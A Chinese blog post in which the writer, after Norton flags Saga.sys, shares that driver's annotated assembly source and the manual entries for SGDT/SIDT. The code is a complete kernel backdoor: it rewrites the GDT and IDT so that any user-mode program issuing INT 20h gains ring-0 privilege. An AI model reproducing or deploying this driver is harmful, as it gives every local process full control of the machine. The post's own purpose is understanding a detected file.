最近系统又超级慢,狠心下了新的诺顿病毒库,然后扫了一下C盘,被查出来一个Saga.sys,搜了一下,说是hexer、forgot修改的Telock用来防止int3的驱动。
simonzh2000对此文件的注释:
.586p
.mmx
.model flat, stdcall
option casemap: none
assume fs :flat
HOOKINT equ 20h                         ; IDT vector this driver repurposes (INT 20h)
.code
;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
; ABI:   stdcall, executes at ring 0 (kernel driver entry; "ret 8" pops both args)
; Purpose: patch the *live* GDT and IDT of the machine:
;   1. GDT slot 0x3e8 becomes a flat 32-bit ring-0 code descriptor
;      (base 0, limit 4 GB, 0x00cf9a00 = P=1, DPL=0, exec/read, G=1, D=1).
;   2. The byte at the GDT base (inside the unused null descriptor) is
;      overwritten with 0xC3 (RET).
;   3. IDT vector 20h becomes a 32-bit interrupt gate with type byte 0xEE
;      (P=1, DPL=3, so user mode may issue INT 20h), selector 0x3e8,
;      offset = GDT base, i.e. the lone RET written in step 2.
; Consequence (plain x86 semantics): inside the gate a near RET pops only the
;   interrupted EIP from the ring-0 frame, so whatever follows an INT 20h in
;   the caller continues executing at CPL 0 with CS=0x3e8. Any process can
;   reach kernel privilege through it, and nothing in this file restores the
;   tables, which is the likely reason an AV engine flags Saga.sys.
; In:    [esp+4] = DriverObject, [esp+8] = RegistryPath (both ignored)
; Out:   eax = 0 (STATUS_SUCCESS)
; Clobb: only eax survives changed; pushfd/pushad ... popad/popfd bracket
;        the table edits.
; Stack note: SGDT/SIDT store 6 bytes at [esp-2]: the 16-bit limit lands in
;        the scratch bytes below esp (never read back) and the 32-bit base
;        overlays the just-pushed edx, so "pop edx" returns the table base.
;        Bytes below esp are not safe across an interrupt at ring 0, but the
;        limit is discarded anyway.
;-----------------------------------------------------------------------
startup:
nop                                     ; four NOPs: presumably entry padding / patch slot - purpose not stated here
nop
nop
nop
pushfd                                  ; keep caller's flags (the .if blocks alter them)
pushad                                  ; keep all GPRs; only eax is rewritten on exit
push edx                                ; reserve 4 bytes that SGDT's base field will overlay
sgdt [esp-2]                            ; limit -> [esp-2..esp-1] (scratch), base -> [esp..esp+3]
pop edx                                 ; edx = GDT linear base
mov eax,edx ;EDX.EAX->GDT BASE          ; eax also = GDT base (needed later for the gate offset)
mov ecx, 3e8h                           ; byte offset of the GDT slot to (re)write = selector 0x3e8
.if dword ptr [eax+ecx+4]!=00cf9a00h ;3e8 ring0 code32   ; skip if our descriptor is already there
mov byte ptr [eax],0c3h ;ret            ; plant RET at GDT base (inside the null descriptor)
mov dword ptr [eax+ecx],0000ffffh       ; descriptor low dword: base 0, limit 0xffff
mov dword ptr [eax+ecx+4],00cf9a00h     ; descriptor high dword: P=1 DPL=0 code, G=1 D=1
.endif
push edx                                ; same trick as above, now for the IDT
sidt [esp-2]                            ; base -> overlays pushed edx
pop edx                                 ; edx = IDT linear base
add edx, HOOKINT*8 ;edx->int 20h        ; 8-byte gate entries -> edx = &IDT[20h]
.if dword ptr [edx+2]!=0ee0003e8h ;int 20 gate ->gdt base(ret)   ; skip if gate already patched
mov dword ptr[edx+2],0ee0003e8h         ; [edx+2]=selector 0x3e8, [edx+4]=0 (reserved), [edx+5]=0xEE type/DPL3/P
mov [edx],ax                            ; gate offset bits 15..0  = GDT base low word (eax still = GDT base)
shr eax, 16
mov [edx+6], ax                         ; gate offset bits 31..16 = GDT base high word
.endif
popad
popfd
xor eax, eax                            ; STATUS_SUCCESS
ret 8                                   ; stdcall: discard the two DriverEntry arguments
end startup
查了一下说明:
SGDT - Store Global Descriptor Table (286+ privileged)
Usage: SGDT dest
Modifies flags: none
Stores the Global Descriptor Table (GDT) Register into the
specified operand.
SIDT - Store Interrupt Descriptor Table (286+ privileged)
Usage: SIDT dest
Modifies flags: none
Stores the Interrupt Descriptor Table (IDT) Register into the
specified operand.
大体理解了一下意思,具体不懂。现在该学的太多了,都不知道从何下手,郁闷